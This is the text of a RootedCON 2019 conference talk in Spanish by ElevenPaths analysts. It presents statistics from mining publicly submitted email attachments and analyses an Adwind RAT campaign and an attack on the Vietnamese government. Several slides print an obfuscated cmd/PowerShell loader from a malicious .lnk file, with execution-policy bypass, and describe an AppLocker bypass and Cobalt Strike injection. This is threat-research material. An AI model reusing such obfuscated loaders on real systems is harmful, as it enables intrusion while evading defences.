El documento resume los resultados de análisis de correos electrónicos realizados durante 4 meses utilizando la plataforma Mail Mincer de ElevenPaths. Se destaca un ataque sofisticado dirigido al gobierno de Vietnam que utilizaba técnicas como AppLocker bypass, decoy files y carga de malware COBALT a través de .NET. El análisis también mostró que los correos electrónicos son un importante vector de entrada y que existen muchos correos accesibles públicamente que podrían usarse para extraer información de organizaciones.

1. 1RootedCON 2019
An Other Bad Email
/RootedCON Madrid 2019

2. 2RootedCON 2019
¿Quienes somos?
Miguel Ángel de Castro
Senior Cyberthreats Analyst en ElevenPaths (Telefónica)
Pablo San Emeterio
Innovation Analyst & CSA ElevenPaths (Telefónica)

3. 3RootedCON 2019
email
Email! Email! Email!

4. 4RootedCON 2019
Emails en Fuente abierta… fuga de datos….
From emails
To emails
Subjects
Adjuntos
Body:(passwords,contexto,
INFORMACIÓN….)
Etc…..
……

5. 5RootedCON 2019
---DISCLAIMER--- The contents of this E-mail (including the contents of the enclosure/(s) or attachment/(s)
if any) are privileged and confidential material of Mahindra and Mahindra Limited
and should not be disclosed to, used by or copied in any manner by anyone other than the intended
addressee/(s).
If this E-mail (including the enclosure/(s) or attachment/(s) if any ) has been received in error, please advise
the sender immediately and
delete it from your system. The views expressed in this E-mail message (including the enclosure/(s) or
attachment/(s) if any) are those of the individual sender.
Emails en Fuente abierta… fuga de datos…

6. 6RootedCON 2019
Malware Banco Pakistan

7. 7RootedCON 2019
El origen… Bancos Pakistan
YARA

8. 8RootedCON 2019
Malware Banco Pakistan
Description:
Adwind es un RAT basado en Java que se instala silenciosamente y se conecta a un
sitio remoto a través de un puerto preconfigurado para recibir comandos del
atacante remoto. Cuando está activo, es capaz de robar información de usuario y
también puede utilizarse para distribuir otro malware.

9. 9RootedCON 2019
MAIL MINCER

10. 10RootedCON 2019
MAIL MINCER: Arquitectura
PLATAFORMA DE HUNTING EN
SISTEMA DATA ANALITYC
PROCESAMIENTO
ML: DIARIO
SANDBOX: WILDFIRE
PALOALTO
AV: VIRUSTOTAL
Cabeceras
Adjuntos
Contenido
Etc…
• Tecnología interna.
• Permite analizar documentos ofimáticos y PDF
• Sin necesidad de subir el archivo completo.
Analiza protegiendo la privacidad.
• No utiliza tecnología antivirus, sino un sistema de
predicción propio basado en Machine Learning
• Permite para el analista bucear por los datos de
todos esos documentos, sin conocer su contenido
ni quién lo subió, solo los datos relevantes para
una investigación

11. 11RootedCON 2019
MAIL MINCER: Tabla resultados

12. 12RootedCON 2019
MAIL MINCER: Dashboard

13. 13RootedCON 2019
MAIL MINCER: Dashboard

14. 14RootedCON 2019
DIARIO

15. 15RootedCON 2019
DIARIO

16. 16RootedCON 2019
DIARIO

17. 17RootedCON 2019
DIARIO
Quien esté interesado en acceder al panel o la API, que se
dirija a diario.e-paths.com y que escriba a labs@11paths.com
identificándose como RootedXEdition.

18. 18RootedCON 2019
ANÁLISIS ESTADÍSTICO

19. 19RootedCON 2019
Tipos de ficheros País primer envío a VT
Resultados estadisticos (4 meses)
Elementos procesados

20. 21RootedCON 2019
Top 30 de adjunto 1 Top 30 de adjunto 2
Top 30 de asuntos
Resultados estadisticos (4 meses)
Elementos procesados

21. 22RootedCON 2019
Top 20 From emails
Resultados estadisticos (4 meses)
Elementos procesados

22. 23RootedCON 2019
Bottom 20 From emails solo 1 email
Resultados estadisticos (4 meses)
Elementos procesados

23. 24RootedCON 2019
Top 20 To emails
Resultados estadisticos (4 meses)
Elementos procesados

24. 25RootedCON 2019
Bottom 20 To emails solo 1 email
Resultados estadisticos (4 meses)
Elementos procesados

25. 26RootedCON 2019
Top 25 From: dominios .es
Resultados estadisticos (4 meses)
Elementos procesados
Banca
Alimentación
Construcción
Marketing
Industrial
Alimentación
LimpiezaBanca
Banca
Industrial
Logística
Universidad
Servicios
Industrial
Industrial
Alimentación
Servicios
Empresarial
Universidad

26. 27RootedCON 2019
Top 25 To: dominios .es
Resultados estadisticos (4 meses)
Elementos procesados
Consultoría
Consultoría
Transportes
Gestión
Telco
Informática
Logística
Construcción
Automoción
Limpieza
Industrial
Ciberseguridad
Servicios

27. 28RootedCON 2019
SECTORES

28. 29RootedCON 2019
Resultados estadisticos: Sector Banca
Distribución por paísesTOP de usuarios de VT que suben emails

29. 30RootedCON 2019
Resultados estadisticos: Sector Banca

30. 31RootedCON 2019
Resultados estadisticos: Sector Banca

31. 32RootedCON 2019
Resultados estadisticos: Sector Telco
Distribución por paísesTOP de usuarios de VT que suben emails

32. 33RootedCON 2019
Resultados estadisticos: Sector Telco

33. 34RootedCON 2019
Resultados estadisticos: Sector Telco

34. 35RootedCON 2019
Resultados estadisticos: cuentas “publicas”
Distribución por paísesTOP de usuarios de VT que suben emails

35. 36RootedCON 2019
Resultados estadisticos: cuentas “publicas”
DOMINIOS RECEPTORES DE EMAILS DOMINIOS ENVIADORES DE EMAILS

36. 37RootedCON 2019
Resultados estadisticos: cuentas “publicas”

37. 38RootedCON 2019
GOBIERNOS

38. 39RootedCON 2019
Análisis .gov
DOMINIOS .GOV RECEPTORES DE EMAIL
CUENTAS QUE ENVIAN EMAIL A DOMINIOS .GOV
Total: 531 emails
270
44

39. 40RootedCON 2019
Análisis .gov
Total: 531 emails
270
PAISES QUE MANDAN A FUENTE PUBLICA EMAILS .GOV
184
142
CUENTAS VT QUE MANDAN A FUENTE PUBLICA EMAILS .GOV
207
153
44

40. 41RootedCON 2019
Análisis .gov Total: 531 emails
0 DETECCIONES EN VIRUSTOTAL
270
DETECCIONES EN VIRUSTOTAL > 1
180
241
82
NUMERO POSITIVOS EN VIRUSTOTALTIPOS DE FICHERO EN ADJUNTOS
64
5
12
6

41. 42RootedCON 2019
Análisis .gov JUNTAMOS TODAS LAS ANALÍTICAS

42. 43RootedCON 2019
184
142 207
APARECEN LAS SINGULARIDADES!!Análisis .gov

43. 44RootedCON 2019
142 207
Ataque sofisticado al gobierno de Vietnam

44. 45RootedCON 2019
184
142 207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
DOS FUSCATION + FILE CARVING + FILESS POWERSHELL + AppLocker Bypass + Cobalt
.net inyecta en memoria cobalt
Intalador legitimo .net para
AppLocker Bypass
Decoy file
Ataque sofisticado al gobierno de Vietnam

45. 46RootedCON 2019
184
142
207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
C:Windowssystem32cmd.exe /c findstring /b /i "iex"
C:UsersAdminDesktopattachment_toolTKCT quy I nam 2019.doc.lnk
powershell.exe bypass -file C:UsersAdminAppDataLocalTemps.ps1
DOS OFUSCATION DECODIFICADO
FILE CARVING
Ataque sofisticado al gobierno de Vietnam

46. 47RootedCON 2019
184
142 207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
Ataque sofisticado al gobierno de Vietnam

47. 48RootedCON 2019
184
142 207
.net inyecta en memoria cobalt
Intalador legitimo .net para
AppLocker Bypass
Decoy file
Ataque sofisticado al gobierno de Vietnam

48. 49RootedCON 2019
184
Ataque sofisticado al gobierno de Vietnam

49. 50RootedCON 2019
184
207
Ataque sofisticado al gobierno de Vietnam

50. 51RootedCON 2019
184
Instalador legitimo .net para AppLocker
Bypass que carga el binario compilado .NET
Ataque sofisticado al gobierno de Vietnam

51. 52RootedCON 2019
184
142 207
Ataque sofisticado al gobierno de Vietnam
.NET inyecta en memoria cobalt

52. 53RootedCON 2019
184
142 207
.NET inyecta en memoria cobalt
Ataque sofisticado al gobierno de Vietnam

53. 54RootedCON 2019
142 207
.NET inyecta en
memoria cobalt
Ataque sofisticado al gobierno de Vietnam

54. 55RootedCON 2019
184
142 207
Ataque sofisticado al gobierno de Vietnam
COBALT

55. 56RootedCON 2019
184
142 207
Ataque sofisticado al gobierno de Vietnam

56. 57RootedCON 2019
CONCLUSIONES

57. 58RootedCON 2019
184
142 207
• EL EMAIL ES UNO DE LOS PRINCIPALES VECTORES DE ENTRADA A UNA ORGANIZACIÓN, LOS CONTROLES
PREVIOS NO SON SUFICIENTEMENTE EFECTIVOS.
• EXISTEN MUCHOS CORREOS ACCESIBLES EN FUENTE ABIERTA ACCESIBLES PARA CUALQUIERA, ESTO
PERMITEACCEDER A INFORMACIÓN SENSIBLE DE UNA ORGANIZACIÓN Y REALIZAR PERFILADO DE LA MISMA.
• LA VARIEDAD DE MALWARE ENCONTRADO ES AMPLIA, CON MUCHA PRESENCIA DE EMOTET
• LAS TÉCNICAS MAS INTERESANTES ENCONTRADAS PARA EVITAR LA DETECCIÓN POR AV, SANDBOX O ML
SON:
• ADJUNTOS COMPRIMIDOS CON UNA PASSWORD PRESENTE EN EL PROPIO EMAIL
• FILESS MEDIANTE POWERSHELL
• DOS-FUSCATION
• EXPLOITS EN DOCUMENTOS OFIMÁTICOS Y PDF
• APPLOCKER BYPASS
• LOS ATACANTES DEDICAN MÁS ESFUERZO AL DESPLIEGUE DEL MALWARE PARA NO SER DETECTADOS QUE
AL DESARROLLO DE NUEVAS PIEZAS DE MALWARE´
Analisis .gov

58. 59RootedCON 2019
184
142 207
Agradecimientos

59. 60RootedCON 2019
Q&A

60. 61RootedCON 2019
Muchas gracias